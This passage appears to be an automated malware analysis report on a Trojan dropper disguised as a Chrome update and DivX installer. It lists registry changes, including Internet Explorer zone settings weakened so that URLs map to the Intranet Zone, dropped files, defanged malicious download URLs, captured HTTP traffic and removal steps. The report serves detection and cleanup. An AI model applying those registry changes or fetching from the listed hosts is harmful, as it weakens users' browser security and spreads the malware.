[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"UninstallString" = "%Program Files%\Your Product\uninstall.exe /U:%Program Files%\Your Product\Uninstall\uninstall.xml"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"InstallLocation" = "%Program Files%\Your Product"
"URLInfoAbout" = "http://www.yourcompany.com"
"DisplayVersion" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Contact" = "Your Company Support Department"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayName" = "Your Product"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 00 60 AE EB 24 2A E3 19 B4 23 65 1A D4 A7 6E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Publisher" = "Your Company"
The process chromeupdate.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E7 12 98 0A 73 1B DF 13 86 55 77 36 1A D5 9D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
43e8f913fde18c9d26a5ef9fea97cfe7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\MediaPlayer__15159_il35679.exe |
e47d6ec4ca18c28652cc9512416f49d2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe |
ef609c21581a902f2f156f92477d91e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\chromeupdate.exe |
42971c53e22b8a4d1e67bcab1cb65af8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\msconfig.exe |
c3f5f4a1fb69b5889f0bbb313cf6017f | c:\Program Files\Your Product\lua5.1.dll |
9bdcf813d65265255b820bc7a704da3c | c:\Program Files\Your Product\uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.3.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.3.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 22296 | 22528 | 4.47735 | c76b9ce587690b8a39ba7840b7dd540c |
.rdata | 28672 | 11906 | 12288 | 3.44864 | e96aa4f970e6f6799910a72904df3100 |
.data | 40960 | 6504 | 3072 | 1.79291 | e504fdbba062ee9bbd9ac425a4f5c0f5 |
.rsrc | 49152 | 114432 | 114688 | 5.20694 | d1acdca72b7083ccd64674f12ec99111 |
.reloc | 163840 | 4242 | 4608 | 2.5731 | a88bdb6f651ecf67b1b3db4a2866ea4e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://bumpacpacba.com/down/kabo/apps.php | 23.254.165.46 |
hxxp://ul.to/file/cmu9yf4p | 81.171.123.200 |
hxxp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 | 81.171.103.15 |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | |
hxxp://d3a3s75zr23wnc.cloudfront.net/V31/amipb.js | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png | |
hxxp://www.download-way.com/index.php | 54.83.25.106 |
hxxp://uploaded.net/file/cmu9yf4p | 81.171.123.200 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | 216.137.59.70 |
hxxp://www.download-way.com/finalize.php | 54.83.25.106 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | 216.137.59.70 |
hxxp://cdn1.downloadsoup.com/V31/amipb.js | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | 216.137.59.70 |
hxxp://ul.to/cmu9yf4p | 81.171.123.200 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | 216.137.59.70 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ihGFCsM8E_plzZ0J6HTBF9Hk8QKHpVjql3hy0vm1OaCsZhanKUhZog==
body {.. font-size:10px;. background:#eaeaea;. font-family: Arial;. margin: 0;. padding: 0;. color:#000000; .}..div, span, textarea {. cursor: default;.}..a, a span, a div {. cursor: pointer;.}../* whole screen styles */..ami-wrapper{. background : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}../* moddle element */..#ami-body.{..position: relative;. padding-left:27;. padding-right:27;.}...bottom-line{. background-color:#5cafd4;. height:45px;. width:100%;.}..table {. border-collapse: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..textarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 5px;.}...textarea1{. background:#ffffff;. color:#000000;. height:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0px;.}../* footer and footer buttons */...bottom-holder{. background-image:url('footer_img.png');. background-repeat:repeat-x;. height:59px;. position:absolute;. bottom:0px;. padding-left:20px;. padding-right:20px;.}...#btnNext{. background: url('next.gif') no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repeat;.}../* Use for cancle with no popup !!! */.#btnBack{. background: url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.gif') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repeat;.}...btn-finish-install{. background: url('finish.gif') no-r
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Fri, 18 Sep 2015 23:00:51 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22753
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fsZaDnw4YxQ1C1bo9ycU8q_uVjQ92b_dnFTMY4AfaH8i95_1ikRqTg==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397DFE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.]l....IEND.B`.....
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2897
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kneYqdjb33irVWIslI4GjhfH-yNyxQmdMbmQDpmUZ16MMWmiJQ7_0w==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....u.,....e........ot.............o..nC.............GCn.t.D.............BC.EF.............EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*....!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0......t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. ............................... }.J0...&x...f...-......AH.]pa..(..".A....=.(....p....X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P..P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t............!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt......m...k..........n.f.AH...k...............p..../.......7.....!...Wl.K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t....L7...s....;....
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -apQrhg9QXRCyPP2fyUgdtnxuF7SDjvFauvCwh7jqXMXzUZAdQOFvQ==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....e........|"E......*\......?...)....3j...... Cb.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:......`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f..$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x.......F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1...4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YEk9S8jOVorpCH9cVz6nyJEb5E_2Lk6eZPEudQm6PZYsuwBWQBxi_g==
GIF89ae............pppa.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:59 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2895
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kgsrX92jwc2x2VRBAYO3YeumSb004M1L2IJQauwWIBVZfBh1sNvEYQ==
GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>
GET /file/cmu9yf4p HTTP/1.1
Accept: */*
